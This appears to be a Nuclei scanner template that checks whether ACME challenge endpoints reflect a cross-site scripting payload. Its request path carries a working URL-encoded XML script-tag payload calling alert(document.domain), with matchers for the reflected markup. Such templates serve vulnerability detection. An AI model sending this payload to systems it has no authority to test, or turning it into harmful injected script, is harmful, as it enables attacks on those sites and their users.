id: acme-xss

info:
  name: Let's Encrypt - Cross-Site Scripting
  author: pdteam
  severity: high
  description: Let's Encrypt contains a cross-site scripting vulnerability when using the the ACME protocol to issue SSL certificates.
  reference:
    - https://www.mike-gualtieri.com/posts/chaining-remote-web-vulnerabilities-to-abuse-lets-encrypt
    - https://community.letsencrypt.org/t/xss-via-acme-implementations/72295
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    max-request: 1
  tags: xss,acme

http:
  - method: GET
    path:
      - '{{BaseURL}}/.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<?xml version=\"1.0\"?><x:script xmlns:x=\"http://www.w3.org/1999/xhtml\">alert(document.domain)</x:script>"

      - type: word
        words:
          - "/xml"
          - "/html"

# digest: 4a0a0047304502203dd1e78138abdcb11458df6497089b1232c5ec8f429da1e504786ce6e180c311022100f2c5e21e37c88c7db45d50a91564b14cf9e10142f8cf80bc0edd322cbb70cc41:922c64590222798bb761d5b6d8e72950